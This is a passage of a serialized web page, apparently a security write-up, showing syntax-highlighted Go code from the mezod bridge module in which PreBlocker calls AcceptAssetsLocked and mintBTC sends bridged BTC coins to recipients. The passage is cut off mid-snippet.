attacks.",{"type":26,"tag":35,"props":84265,"children":84266},{},[84267],{"type":26,"tag":41,"props":84268,"children":84271},{"href":84269,"rel":84270},"https://github.com/mezo-org/mezod/blob/d3b1a049a9acce977fdadd245cb381252f101922/x/bridge/keeper/assets_locked.go#L170",[45],[84272],{"type":32,"value":79342},{"type":26,"tag":5512,"props":84274,"children":84276},{"code":84275,"language":78767,"meta":7,"className":78768,"style":7},"func (pbh *PreBlockHandler) PreBlocker() sdk.PreBlocker {\n    return func(\n        ctx sdk.Context,\n        req *cmtabci.RequestFinalizeBlock,\n    ) (*sdk.ResponsePreBlock, error) {\n        ...\n        err := pbh.bridgeKeeper.AcceptAssetsLocked(ctx, events)\n        if err != nil {\n            return nil, fmt.Errorf(\"cannot accept AssetsLocked events: %w\", err)\n        }\n        ...\n    }\n}\n\nfunc (k Keeper) AcceptAssetsLocked(\n    ctx sdk.Context,\n    events types.AssetsLockedEvents,\n) error {\n    ...\n    for _, event := range events {\n        recipient, err := sdk.AccAddressFromBech32(event.Recipient)\n        if err != nil {\n            return fmt.Errorf(\"failed to parse recipient address: %w\", err)\n        }\n\n        if bytes.Equal(event.TokenBytes(), sourceBTCToken) {\n            err = k.mintBTC(ctx, recipient, event.Amount)\n            if err != nil {\n                return fmt.Errorf(\n                    \"failed to mint BTC for event %v: %w\",\n                    event.Sequence,\n                    err,\n                )\n            }\n        } else {\n            ...\n        }\n    }\n    ...\n}\n\nfunc (k Keeper) mintBTC(\n    ctx sdk.Context,\n    recipient sdk.AccAddress,\n    amount math.Int,\n) error {\n    ...\n    err = k.bankKeeper.SendCoinsFromModuleToAccount(\n        ctx,\n        types.ModuleName,\n        recipient,\n        coins,\n    )\n    if err != nil {\n        return fmt.Errorf(\"failed to send coins: %w\", err)\n    }\n    ...\n}\n",[84277],{"type":26,"tag":130,"props":84278,"children":84279},{"__ignoreMap":7},[84280,84333,84348,84371,84401,84437,84445,84501,84525,84575,84582,84589,84596,84603,84610,84641,84664,84689,84704,84711,84748,84802,84825,84866,84873,84880,84931,84992,85015,85038,85050,85071,85083,85091,85098,85113,85121,85128,85135,85142,85149,85156,85187,85210,85235,85260,85275,85282,85319,85330,85351,85362,85374,85381,85404,85444,85451,85458],{"type":26,"tag":137,"props":84281,"children":84282},{"class":5559,"line":5560},[84283,84287,84291,84296,84300,84305,84309,84313,84317,84321,84325,84329],{"type":26,"tag":137,"props":84284,"children":84285},{"style":5573},[84286],{"type":32,"value":78903},{"type":26,"tag":137,"props":84288,"children":84289},{"style":5601},[84290],{"type":32,"value":4625},{"type":26,"tag":137,"props":84292,"children":84293},{"style":5584},[84294],{"type":32,"value":84295},"pbh ",{"type":26,"tag":137,"props":84297,"children":84298},{"style":5590},[84299],{"type":32,"value":7152},{"type":26,"tag":137,"props":84301,"children":84302},{"style":6009},[84303],{"type":32,"value":84304},"PreBlockHandler",{"type":26,"tag":137,"props":84306,"children":84307},{"style":5601},[84308],{"type":32,"value":5671},{"type":26,"tag":137,"props":84310,"children":84311},{"style":5682},[84312],{"type":32,"value":84005},{"type":26,"tag":137,"props":84314,"children":84315},{"style":5601},[84316],{"type":32,"value":16634},{"type":26,"tag":137,"props":84318,"children":84319},{"style":6009},[84320],{"type":32,"value":81332},{"type":26,"tag":137,"props":84322,"children":84323},{"style":5601},[84324],{"type":32,"value":470},{"type":26,"tag":137,"props":84326,"children":84327},{"style":6009},[84328],{"type":32,"value":84005},{"type":26,"tag":137,"props":84330,"children":84331},{"style":5601},[84332],{"type":32,"value":5875},{"type":26,"tag":137,"props":84334,"children":84335},{"class":5559,"line":5412},[84336,84340,84344],{"type":26,"tag":137,"props":84337,"children":84338},{"style":5610},[84339],{"type":32,"value":19582},{"type":26,"tag":137,"props":84341,"children":84342},{"style":5573},[84343],{"type":32,"value":82611},{"type":26,"tag":137,"props":84345,"children":84346},{"style":5601},[84347],{"type":32,"value":6054},{"type":26,"tag":137,"props":84349,"children":84350},{"class":5559,"line":5417},[84351,84355,84359,84363,84367],{"type":26,"tag":137,"props":84352,"children":84353},{"style":5584},[84354],{"type":32,"value":28778},{"type":26,"tag":137,"props":84356,"children":84357},{"style":6009},[84358],{"type":32,"value":81243},{"type":26,"tag":137,"props":84360,"children":84361},{"style":5601},[84362],{"type":32,"value":470},{"type":26,"tag":137,"props":84364,"children":84365},{"style":6009},[84366],{"type":32,"value":78952},{"type":26,"tag":137,"props":84368,"children":84369},{"style":5601},[84370],{"type":32,"value":6099},{"type":26,"tag":137,"props":84372,"children":84373},{"class":5559,"line":5642},[84374,84379,84383,84388,84392,84397],{"type":26,"tag":137,"props":84375,"children":84376},{"style":5584},[84377],{"type":32,"value":84378},"        req",{"type":26,"tag":137,"props":84380,"children":84381},{"style":5590},[84382],{"type":32,"value":12406},{"type":26,"tag":137,"props":84384,"children":84385},{"style":6009},[84386],{"type":32,"value":84387},"cmtabci",{"type":26,"tag":137,"props":84389,"children":84390},{"style":5601},[84391],{"type":32,"value":470},{"type":26,"tag":137,"props":84393,"children":84394},{"style":6009},[84395],{"type":32,"value":84396},"RequestFinalizeBlock",{"type":26,"tag":137,"props":84398,"children":84399},{"style":5601},[84400],{"type":32,"value":6099},{"type":26,"tag":137,"props":84402,"children":84403},{"class":5559,"line":5745},[84404,84408,84412,84416,84420,84425,84429,84433],{"type":26,"tag":137,"props":84405,"children":84406},{"style":5601},[84407],{"type":32,"value":82679},{"type":26,"tag":137,"props":84409,"children":84410},{"style":5590},[84411],{"type":32,"value":7152},{"type":26,"tag":137,"props":84413,"children":84414},{"style":6009},[84415],{"type":32,"value":81332},{"type":26,"tag":137,"props":84417,"children":84418},{"style":5601},[84419],{"type":32,"value":470},{"type":26,"tag":137,"props":84421,"children":84422},{"style":6009},[84423],{"type":32,"value":84424},"ResponsePreBlock",{"type":26,"tag":137,"props":84426,"children":84427},{"style":5601},[84428],{"type":32,"value":1108},{"type":26,"tag":137,"props":84430,"children":84431},{"style":6009},[84432],{"type":32,"value":17455},{"type":26,"tag":137,"props":84434,"children":84435},{"style":5601},[84436],{"type":32,"value":17395},{"type":26,"tag":137,"props":84438,"children":84439},{"class":5559,"line":5850},[84440],{"type":26,"tag":137,"props":84441,"children":84442},{"style":5590},[84443],{"type":32,"value":84444},"        ...\n",{"type":26,"tag":137,"props":84446,"children":84447},{"class":5559,"line":5878},[84448,84453,84457,84462,84466,84471,84475,84480,84484,84488,84492,84497],{"type":26,"tag":137,"props":84449,"children":84450},{"style":5584},[84451],{"type":32,"value":84452},"        err",{"type":26,"tag":137,"props":84454,"children":84455},{"style":5590},[84456],{"type":32,"value":79019},{"type":26,"tag":137,"props":84458,"children":84459},{"style":5584},[84460],{"type":32,"value":84461}," pbh",{"type":26,"tag":137,"props":84463,"children":84464},{"style":5601},[84465],{"type":32,"value":470},{"type":26,"tag":137,"props":84467,"children":84468},{"style":5584},[84469],{"type":32,"value":84470},"bridgeKeeper",{"type":26,"tag":137,"props":84472,"children":84473},{"style":5601},[84474],{"type":32,"value":470},{"type":26,"tag":137,"props":84476,"children":84477},{"style":5682},[84478],{"type":32,"value":84479},"AcceptAssetsLocked",{"type":26,"tag":137,"props":84481,"children":84482},{"style":5601},[84483],{"type":32,"value":165},{"type":26,"tag":137,"props":84485,"children":84486},{"style":5584},[84487],{"type":32,"value":22874},{"type":26,"tag":137,"props":84489,"children":84490},{"style":5601},[84491],{"type":32,"value":1108},{"type":26,"tag":137,"props":84493,"children":84494},{"style":5584},[84495],{"type":32,"value":84496},"events",{"type":26,"tag":137,"props":84498,"children":84499},{"style":5601},[84500],{"type":32,"value":5742},{"type":26,"tag":137,"props":84502,"children":84503},{"class":5559,"line":5891},[84504,84508,84512,84516,84521],{"type":26,"tag":137,"props":84505,"children":84506},{"style":5610},[84507],{"type":32,"value":5856},{"type":26,"tag":137,"props":84509,"children":84510},{"style":5584},[84511],{"type":32,"value":51123},{"type":26,"tag":137,"props":84513,"children":84514},{"style":5590},[84515],{"type":32,"value":66987},{"type":26,"tag":137,"props":84517,"children":84518},{"style":5573},[84519],{"type":32,"value":84520}," nil",{"type":26,"tag":137,"props":84522,"children":84523},{"style":5601},[84524],{"type":32,"value":5875},{"type":26,"tag":137,"props":84526,"children":84527},{"class":5559,"line":5909},[84528,84532,84536,84540,84545,84549,84554,84558,84563,84567,84571],{"type":26,"tag":137,"props":84529,"children":84530},{"style":5610},[84531],{"type":32,"value":81678},{"type":26,"tag":137,"props":84533,"children":84534},{"style":5573},[84535],{"type":32,"value":84520},{"type":26,"tag":137,"props":84537,"children":84538},{"style":5601},[84539],{"type":32,"value":1108},{"type":26,"tag":137,"props":84541,"children":84542},{"style":5584},[84543],{"type":32,"value":84544},"fmt",{"type":26,"tag":137,"props":84546,"children":84547},{"style":5601},[84548],{"type":32,"value":470},{"type":26,"tag":137,"props":84550,"children":84551},{"style":5682},[84552],{"type":32,"value":84553},"Errorf",{"type":26,"tag":137,"props":84555,"children":84556},{"style":5601},[84557],{"type":32,"value":165},{"type":26,"tag":137,"props":84559,"children":84560},{"style":6837},[84561],{"type":32,"value":84562},"\"cannot accept AssetsLocked events: %w\"",{"type":26,"tag":137,"props":84564,"children":84565},{"style":5601},[84566],{"type":32,"value":1108},{"type":26,"tag":137,"props":84568,"children":84569},{"style":5584},[84570],{"type":32,"value":51022},{"type":26,"tag":137,"props":84572,"children":84573},{"style":5601},[84574],{"type":32,"value":5742},{"type":26,"tag":137,"props":84576,"children":84577},{"class":5559,"line":5930},[84578],{"type":26,"tag":137,"props":84579,"children":84580},{"style":5601},[84581],{"type":32,"value":5936},{"type":26,"tag":137,"props":84583,"children":84584},{"class":5559,"line":5939},[84585],{"type":26,"tag":137,"props":84586,"children":84587},{"style":5590},[84588],{"type":32,"value":84444},{"type":26,"tag":137,"props":84590,"children":84591},{"class":5559,"line":6191},[84592],{"type":26,"tag":137,"props":84593,"children":84594},{"style":5601},[84595],{"type":32,"value":5945},{"type":26,"tag":137,"props":84597,"children":84598},{"class":5559,"line":6208},[84599],{"type":26,"tag":137,"props":84600,"children":84601},{"style":5601},[84602],{"type":32,"value":6507},{"type":26,"tag":137,"props":84604,"children":84605},{"class":5559,"line":6225},[84606],{"type":26,"tag":137,"props":84607,"children":84608},{"emptyLinePlaceholder":18},[84609],{"type":32,"value":6276},{"type":26,"tag":137,"props":84611,"children":84612},{"class":5559,"line":6238},[84613,84617,84621,84625,84629,84633,84637],{"type":26,"tag":137,"props":84614,"children":84615},{"style":5573},[84616],{"type":32,"value":78903},{"type":26,"tag":137,"props":84618,"children":84619},{"style":5601},[84620],{"type":32,"value":4625},{"type":26,"tag":137,"props":84622,"children":84623},{"style":5584},[84624],{"type":32,"value":83730},{"type":26,"tag":137,"props":84626,"children":84627},{"style":6009},[84628],{"type":32,"value":82547},{"type":26,"tag":137,"props":84630,"children":84631},{"style":5601},[84632],{"type":32,"value":5671},{"type":26,"tag":137,"props":84634,"children":84635},{"style":5682},[84636],{"type":32,"value":84479},{"type":26,"tag":137,"props":84638,"children":84639},{"style":5601},[84640],{"type":32,"value":6054},{"type":26,"tag":137,"props":84642,"children":84643},{"class":5559,"line":6247},[84644,84648,84652,84656,84660],{"type":26,"tag":137,"props":84645,"children":84646},{"style":5584},[84647],{"type":32,"value":22817},{"type":26,"tag":137,"props":84649,"children":84650},{"style":6009},[84651],{"type":32,"value":81243},{"type":26,"tag":137,"props":84653,"children":84654},{"style":5601},[84655],{"type":32,"value":470},{"type":26,"tag":137,"props":84657,"children":84658},{"style":6009},[84659],{"type":32,"value":78952},{"type":26,"tag":137,"props":84661,"children":84662},{"style":5601},[84663],{"type":32,"value":6099},{"type":26,"tag":137,"props":84665,"children":84666},{"class":5559,"line":6270},[84667,84672,84676,84680,84685],{"type":26,"tag":137,"props":84668,"children":84669},{"style":5584},[84670],{"type":32,"value":84671},"    events",{"type":26,"tag":137,"props":84673,"children":84674},{"style":6009},[84675],{"type":32,"value":80777},{"type":26,"tag":137,"props":84677,"children":84678},{"style":5601},[84679],{"type":32,"value":470},{"type":26,"tag":137,"props":84681,"children":84682},{"style":6009},[84683],{"type":32,"value":84684},"AssetsLockedEvents",{"type":26,"tag":137,"props":84686,"children":84687},{"style":5601},[84688],{"type":32,"value":6099},{"type":26,"tag":137,"props":84690,"children":84691},{"class":5559,"line":6279},[84692,84696,84700],{"type":26,"tag":137,"props":84693,"children":84694},{"style":5601},[84695],{"type":32,"value":5671},{"type":26,"tag":137,"props":84697,"children":84698},{"style":6009},[84699],{"type":32,"value":17455},{"type":26,"tag":137,"props":84701,"children":84702},{"style":5601},[84703],{"type":32,"value":5875},{"type":26,"tag":137,"props":84705,"children":84706},{"class":5559,"line":6288},[84707],{"type":26,"tag":137,"props":84708,"children":84709},{"style":5590},[84710],{"type":32,"value":22933},{"type":26,"tag":137,"props":84712,"children":84713},{"class":5559,"line":6355},[84714,84718,84722,84726,84731,84735,84739,84744],{"type":26,"tag":137,"props":84715,"children":84716},{"style":5610},[84717],{"type":32,"value":5613},{"type":26,"tag":137,"props":84719,"children":84720},{"style":5584},[84721],{"type":32,"value":5618},{"type":26,"tag":137,"props":84723,"children":84724},{"style":5601},[84725],{"type":32,"value":1108},{"type":26,"tag":137,"props":84727,"children":84728},{"style":5584},[84729],{"type":32,"value":84730},"event",{"type":26,"tag":137,"props":84732,"children":84733},{"style":5590},[84734],{"type":32,"value":79019},{"type":26,"tag":137,"props":84736,"children":84737},{"style":5610},[84738],{"type":32,"value":80001},{"type":26,"tag":137,"props":84740,"children":84741},{"style":5584},[84742],{"type":32,"value":84743}," events",{"type":26,"tag":137,"props":84745,"children":84746},{"style":5601},[84747],{"type":32,"value":5875},{"type":26,"tag":137,"props":84749,"children":84750},{"class":5559,"line":6363},[84751,84756,84760,84764,84768,84772,84776,84781,84785,84789,84793,84798],{"type":26,"tag":137,"props":84752,"children":84753},{"style":5584},[84754],{"type":32,"value":84755},"        recipient",{"type":26,"tag":137,"props":84757,"children":84758},{"style":5601},[84759],{"type":32,"value":1108},{"type":26,"tag":137,"props":84761,"children":84762},{"style":5584},[84763],{"type":32,"value":51022},{"type":26,"tag":137,"props":84765,"children":84766},{"style":5590},[84767],{"type":32,"value":79019},{"type":26,"tag":137,"props":84769,"children":84770},{"style":5584},[84771],{"type":32,"value":81243},{"type":26,"tag":137,"props":84773,"children":84774},{"style":5601},[84775],{"type":32,"value":470},{"type":26,"tag":137,"props":84777,"children":84778},{"style":5682},[84779],{"type":32,"value":84780},"AccAddressFromBech32",{"type":26,"tag":137,"props":84782,"children":84783},{"style":5601},[84784],{"type":32,"value":165},{"type":26,"tag":137,"props":84786,"children":84787},{"style":5584},[84788],{"type":32,"value":84730},{"type":26,"tag":137,"props":84790,"children":84791},{"style":5601},[84792],{"type":32,"value":470},{"type":26,"tag":137,"props":84794,"children":84795},{"style":5584},[84796],{"type":32,"value":84797},"Recipient",{"type":26,"tag":137,"props":84799,"children":84800},{"style":5601},[84801],{"type":32,"value":5742},{"type":26,"tag":137,"props":84803,"children":84804},{"class":5559,"line":6393},[84805,84809,84813,84817,84821],{"type":26,"tag":137,"props":84806,"children":84807},{"style":5610},[84808],{"type":32,"value":5856},{"type":26,"tag":137,"props":84810,"children":84811},{"style":5584},[84812],{"type":32,"value":51123},{"type":26,"tag":137,"props":84814,"children":84815},{"style":5590},[84816],{"type":32,"value":66987},{"type":26,"tag":137,"props":84818,"children":84819},{"style":5573},[84820],{"type":32,"value":84520},{"type":26,"tag":137,"props":84822,"children":84823},{"style":5601},[84824],{"type":32,"value":5875},{"type":26,"tag":137,"props":84826,"children":84827},{"class":5559,"line":6401},[84828,84832,84837,84841,84845,84849,84854,84858,84862],{"type":26,"tag":137,"props":84829,"children":84830},{"style":5610},[84831],{"type":32,"value":81678},{"type":26,"tag":137,"props":84833,"children":84834},{"style":5584},[84835],{"type":32,"value":84836}," fmt",{"type":26,"tag":137,"props":84838,"children":84839},{"style":5601},[84840],{"type":32,"value":470},{"type":26,"tag":137,"props":84842,"children":84843},{"style":5682},[84844],{"type":32,"value":84553},{"type":26,"tag":137,"props":84846,"children":84847},{"style":5601},[84848],{"type":32,"value":165},{"type":26,"tag":137,"props":84850,"children":84851},{"style":6837},[84852],{"type":32,"value":84853},"\"failed to parse recipient address: %w\"",{"type":26,"tag":137,"props":84855,"children":84856},{"style":5601},[84857],{"type":32,"value":1108},{"type":26,"tag":137,"props":84859,"children":84860},{"style":5584},[84861],{"type":32,"value":51022},{"type":26,"tag":137,"props":84863,"children":84864},{"style":5601},[84865],{"type":32,"value":5742},{"type":26,"tag":137,"props":84867,"children":84868},{"class":5559,"line":6433},[84869],{"type":26,"tag":137,"props":84870,"children":84871},{"style":5601},[84872],{"type":32,"value":5936},{"type":26,"tag":137,"props":84874,"children":84875},{"class":5559,"line":6441},[84876],{"type":26,"tag":137,"props":84877,"children":84878},{"emptyLinePlaceholder":18},[84879],{"type":32,"value":6276},{"type":26,"tag":137,"props":84881,"children":84882},{"class":5559,"line":6501},[84883,84887,84892,84896,84901,84905,84909,84913,84918,84922,84927],{"type":26,"tag":137,"props":84884,"children":84885},{"style":5610},[84886],{"type":32,"value":5856},{"type":26,"tag":137,"props":84888,"children":84889},{"style":5584},[84890],{"type":32,"value":84891}," bytes",{"type":26,"tag":137,"props":84893,"children":84894},{"style":5601},[84895],{"type":32,"value":470},{"type":26,"tag":137,"props":84897,"children":84898},{"style":5682},[84899],{"type":32,"value":84900},"Equal",{"type":26,"tag":137,"props":84902,"children":84903},{"style":5601},[84904],{"type":32,"value":165},{"type":26,"tag":137,"props":84906,"children":84907},{"style":5584},[84908],{"type":32,"value":84730},{"type":26,"tag":137,"props":84910,"children":84911},{"style":5601},[84912],{"type":32,"value":470},{"type":26,"tag":137,"props":84914,"children":84915},{"style":5682},[84916],{"type":32,"value":84917},"TokenBytes",{"type":26,"tag":137,"props":84919,"children":84920},{"style":5601},[84921],{"type":32,"value":20968},{"type":26,"tag":137,"props":84923,"children":84924},{"style":5584},[84925],{"type":32,"value":84926},"sourceBTCToken",{"type":26,"tag":137,"props":84928,"children":84929},{"style":5601},[84930],{"type":32,"value":17395},{"type":26,"tag":137,"props":84932,"children":84933},{"class":5559,"line":11634},[84934,84939,84943,84947,84951,84956,84960,84964,84968,84972,84976,84980,84984,84988],{"type":26,"tag":137,"props":84935,"children":84936},{"style":5584},[84937],{"type":32,"value":84938},"            err",{"type":26,"tag":137,"props":84940,"children":84941},{"style":5590},[84942],{"type":32,"value":5593},{"type":26,"tag":137,"props":84944,"children":84945},{"style":5584},[84946],{"type":32,"value":83858},{"type":26,"tag":137,"props":84948,"children":84949},{"style":5601},[84950],{"type":32,"value":470},{"type":26,"tag":137,"props":84952,"children":84953},{"style":5682},[84954],{"type":32,"value":84955},"mintBTC",{"type":26,"tag":137,"props":84957,"children":84958},{"style":5601},[84959],{"type":32,"value":165},{"type":26,"tag":137,"props":84961,"children":84962},{"style":5584},[84963],{"type":32,"value":22874},{"type":26,"tag":137,"props":84965,"children":84966},{"style":5601},[84967],{"type":32,"value":1108},{"type":26,"tag":137,"props":84969,"children":84970},{"style":5584},[84971],{"type":32,"value":84253},{"type":26,"tag":137,"props":84973,"children":84974},{"style":5601},[84975],{"type":32,"value":1108},{"type":26,"tag":137,"props":84977,"children":84978},{"style":5584},[84979],{"type":32,"value":84730},{"type":26,"tag":137,"props":84981,"children":84982},{"style":5601},[84983],{"type":32,"value":470},{"type":26,"tag":137,"props":84985,"children":84986},{"style":5584},[84987],{"type":32,"value":81657},{"type":26,"tag":137,"props":84989,"children":84990},{"style":5601},[84991],{"type":32,"value":5742},{"type":26,"tag":137,"props":84993,"children":84994},{"class":5559,"line":11652},[84995,84999,85003,85007,85011],{"type":26,"tag":137,"props":84996,"children":84997},{"style":5610},[84998],{"type":32,"value":61402},{"type":26,"tag":137,"props":85000,"children":85001},{"style":5584},[85002],{"type":32,"value":51123},{"type":26,"tag":137,"props":85004,"children":85005},{"style":5590},[85006],{"type":32,"value":66987},{"type":26,"tag":137,"props":85008,"children":85009},{"style":5573},[85010],{"type":32,"value":84520},{"type":26,"tag":137,"props":85012,"children":85013},{"style":5601},[85014],{"type":32,"value":5875},{"type":26,"tag":137,"props":85016,"children":85017},{"class":5559,"line":11697},[85018,85022,85026,85030,85034],{"type":26,"tag":137,"props":85019,"children":85020},{"style":5610},[85021],{"type":32,"value":63330},{"type":26,"tag":137,"props":85023,"children":85024},{"style":5584},[85025],{"type":32,"value":84836},{"type":26,"tag":137,"props":85027,"children":85028},{"style":5601},[85029],{"type":32,"value":470},{"type":26,"tag":137,"props":85031,"children":85032},{"style":5682},[85033],{"type":32,"value":84553},{"type":26,"tag":137,"props":85035,"children":85036},{"style":5601},[85037],{"type":32,"value":6054},{"type":26,"tag":137,"props":85039,"children":85040},{"class":5559,"line":11803},[85041,85046],{"type":26,"tag":137,"props":85042,"children":85043},{"style":6837},[85044],{"type":32,"value":85045},"                    \"failed to mint BTC for event %v: %w\"",{"type":26,"tag":137,"props":85047,"children":85048},{"style":5601},[85049],{"type":32,"value":6099},{"type":26,"tag":137,"props":85051,"children":85052},{"class":5559,"line":26089},[85053,85058,85062,85067],{"type":26,"tag":137,"props":85054,"children":85055},{"style":5584},[85056],{"type":32,"value":85057},"                    event",{"type":26,"tag":137,"props":85059,"children":85060},{"style":5601},[85061],{"type":32,"value":470},{"type":26,"tag":137,"props":85063,"children":85064},{"style":5584},[85065],{"type":32,"value":85066},"Sequence",{"type":26,"tag":137,"props":85068,"children":85069},{"style":5601},[85070],{"type":32,"value":6099},{"type":26,"tag":137,"props":85072,"children":85073},{"class":5559,"line":26124},[85074,85079],{"type":26,"tag":137,"props":85075,"children":85076},{"style":5584},[85077],{"type":32,"value":85078},"                    err",{"type":26,"tag":137,"props":85080,"children":85081},{"style":5601},[85082],{"type":32,"value":6099},{"type":26,"tag":137,"props":85084,"children":85085},{"class":5559,"line":26132},[85086],{"type":26,"tag":137,"props":85087,"children":85088},{"style":5601},[85089],{"type":32,"value":85090},"                )\n",{"type":26,"tag":137,"props":85092,"children":85093},{"class":5559,"line":26140},[85094],{"type":26,"tag":137,"props":85095,"children":85096},{"style":5601},[85097],{"type":32,"value":61486},{"type":26,"tag":137,"props":85099,"children":85100},{"class":5559,"line":26149},[85101,85105,85109],{"type":26,"tag":137,"props":85102,"children":85103},{"style":5601},[85104],{"type":32,"value":5897},{"type":26,"tag":137,"props":85106,"children":85107},{"style":5610},[85108],{"type":32,"value":5902},{"type":26,"tag":137,"props":85110,"children":85111},{"style":5601},[85112],{"type":32,"value":5875},{"type":26,"tag":137,"props":85114,"children":85115},{"class":5559,"line":26191},[85116],{"type":26,"tag":137,"props":85117,"children":85118},{"style":5590},[85119],{"type":32,"value":85120},"            ...\n",{"type":26,"tag":137,"props":85122,"children":85123},{"class":5559,"line":26224},[85124],{"type":26,"tag":137,"props":85125,"children":85126},{"style":5601},[85127],{"type":32,"value":5936},{"type":26,"tag":137,"props":85129,"children":85130},{"class":5559,"line":26232},[85131],{"type":26,"tag":137,"props":85132,"children":85133},{"style":5601},[85134],{"type":32,"value":5945},{"type":26,"tag":137,"props":85136,"children":85137},{"class":5559,"line":26240},[85138],{"type":26,"tag":137,"props":85139,"children":85140},{"style":5590},[85141],{"type":32,"value":22933},{"type":26,"tag":137,"props":85143,"children":85144},{"class":5559,"line":26249},[85145],{"type":26,"tag":137,"props":85146,"children":85147},{"style":5601},[85148],{"type":32,"value":6507},{"type":26,"tag":137,"props":85150,"children":85151},{"class":5559,"line":26325},[85152],{"type":26,"tag":137,"props":85153,"children":85154},{"emptyLinePlaceholder":18},[85155],{"type":32,"value":6276},{"type":26,"tag":137,"props":85157,"children":85158},{"class":5559,"line":26358},[85159,85163,85167,85171,85175,85179,85183],{"type":26,"tag":137,"props":85160,"children":85161},{"style":5573},[85162],{"type":32,"value":78903},{"type":26,"tag":137,"props":85164,"children":85165},{"style":5601},[85166],{"type":32,"value":4625},{"type":26,"tag":137,"props":85168,"children":85169},{"style":5584},[85170],{"type":32,"value":83730},{"type":26,"tag":137,"props":85172,"children":85173},{"style":6009},[85174],{"type":32,"value":82547},{"type":26,"tag":137,"props":85176,"children":85177},{"style":5601},[85178],{"type":32,"value":5671},{"type":26,"tag":137,"props":85180,"children":85181},{"style":5682},[85182],{"type":32,"value":84955},{"type":26,"tag":137,"props":85184,"children":85185},{"style":5601},[85186],{"type":32,"value":6054},{"type":26,"tag":137,"props":85188,"children":85189},{"class":5559,"line":26366},[85190,85194,85198,85202,85206],{"type":26,"tag":137,"props":85191,"children":85192},{"style":5584},[85193],{"type":32,"value":22817},{"type":26,"tag":137,"props":85195,"children":85196},{"style":6009},[85197],{"type":32,"value":81243},{"type":26,"tag":137,"props":85199,"children":85200},{"style":5601},[85201],{"type":32,"value":470},{"type":26,"tag":137,"props":85203,"children":85204},{"style":6009},[85205],{"type":32,"value":78952},{"type":26,"tag":137,"props":85207,"children":85208},{"style":5601},[85209],{"type":32,"value":6099},{"type":26,"tag":137,"props":85211,"children":85212},{"class":5559,"line":26374},[85213,85218,85222,85226,85231],{"type":26,"tag":137,"props":85214,"children":85215},{"style":5584},[85216],{"type":32,"value":85217},"    recipient",{"type":26,"tag":137,"props":85219,"children":85220},{"style":6009},[85221],{"type":32,"value":81243},{"type":26,"tag":137,"props":85223,"children":85224},{"style":5601},[85225],{"type":32,"value":470},{"type":26,"tag":137,"props":85227,"children":85228},{"style":6009},[85229],{"type":32,"value":85230},"AccAddress",{"type":26,"tag":137,"props":85232,"children":85233},{"style":5601},[85234],{"type":32,"value":6099},{"type":26,"tag":137,"props":85236,"children":85237},{"class":5559,"line":26411},[85238,85242,85247,85251,85256],{"type":26,"tag":137,"props":85239,"children":85240},{"style":5584},[85241],{"type":32,"value":64183},{"type":26,"tag":137,"props":85243,"children":85244},{"style":6009},[85245],{"type":32,"value":85246}," math",{"type":26,"tag":137,"props":85248,"children":85249},{"style":5601},[85250],{"type":32,"value":470},{"type":26,"tag":137,"props":85252,"children":85253},{"style":6009},[85254],{"type":32,"value":85255},"Int",{"type":26,"tag":137,"props":85257,"children":85258},{"style":5601},[85259],{"type":32,"value":6099},{"type":26,"tag":137,"props":85261,"children":85262},{"class":5559,"line":26424},[85263,85267,85271],{"type":26,"tag":137,"props":85264,"children":85265},{"style":5601},[85266],{"type":32,"value":5671},{"type":26,"tag":137,"props":85268,"children":85269},{"style":6009},[85270],{"type":32,"value":17455},{"type":26,"tag":137,"props":85272,"children":85273},{"style":5601},[85274],{"type":32,"value":5875},{"type":26,"tag":137,"props":85276,"children":85277},{"class":5559,"line":26437},[85278],{"type":26,"tag":137,"props":85279,"children":85280},{"style":5590},[85281],{"type":32,"value":22933},{"type":26,"tag":137,"props":85283,"children":85284},{"class":5559,"line":26450},[85285,85290,85294,85298,85302,85307,85311,85315],{"type":26,"tag":137,"props":85286,"children":85287},{"style":5584},[85288],{"type":32,"value":85289},"    err",{"type":26,"tag":137,"props":85291,"children":85292},{"style":5590},[85293],{"type":32,"value":5593},{"type":26,"tag":137,"props":85295,"children":85296},{"style":5584},[85297],{"type":32,"value":83858},{"type":26,"tag":137,"props":85299,"children":85300},{"style":5601},[85301],{"type":32,"value":470},{"type":26,"tag":137,"props":85303,"children":85304},{"style":5584},[85305],{"type":32,"value":85306},"bankKeeper",{"type":26,"tag":137,"props":85308,"children":85309},{"style":5601},[85310],{"type":32,"value":470},{"type":26,"tag":137,"props":85312,"children":85313},{"style":5682},[85314],{"type":32,"value":84245},{"type":26,"tag":137,"props":85316,"children":85317},{"style":5601},[85318],{"type":32,"value":6054},{"type":26,"tag":137,"props":85320,"children":85321},{"class":5559,"line":26504},[85322,85326],{"type":26,"tag":137,"props":85323,"children":85324},{"style":5584},[85325],{"type":32,"value":28778},{"type":26,"tag":137,"props":85327,"children":85328},{"style":5601},[85329],{"type":32,"value":6099},{"type":26,"tag":137,"props":85331,"children":85332},{"class":5559,"line":26513},[85333,85338,85342,85347],{"type":26,"tag":137,"props":85334,"children":85335},{"style":5584},[85336],{"type":32,"value":85337},"        types",{"type":26,"tag":137,"props":85339,"children":85340},{"style":5601},[85341],{"type":32,"value":470},{"type":26,"tag":137,"props":85343,"children":85344},{"style":5584},[85345],{"type":32,"value":85346},"ModuleName",{"type":26,"tag":137,"props":85348,"children":85349},{"style":5601},[85350],{"type":32,"value":6099},{"type":26,"tag":137,"props":85352,"children":85353},{"class":5559,"line":34876},[85354,85358],{"type":26,"tag":137,"props":85355,"children":85356},{"style":5584},[85357],{"type":32,"value":84755},{"type":26,"tag":137,"props":85359,"children":85360},{"style":5601},[85361],{"type":32,"value":6099},{"type":26,"tag":137,"props":85363,"children":85364},{"class":5559,"line":34897},[85365,85370],{"type":26,"tag":137,"props":85366,"children":85367},{"style":5584},[85368],{"type":32,"value":85369},"        